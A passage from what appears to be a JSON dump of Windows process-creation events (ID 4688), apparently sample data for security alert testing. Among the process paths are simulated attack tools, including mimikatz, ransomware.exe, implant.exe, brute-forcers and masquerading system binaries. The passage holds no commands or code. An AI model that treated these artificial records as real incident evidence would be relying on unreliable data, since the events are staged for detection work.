STICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 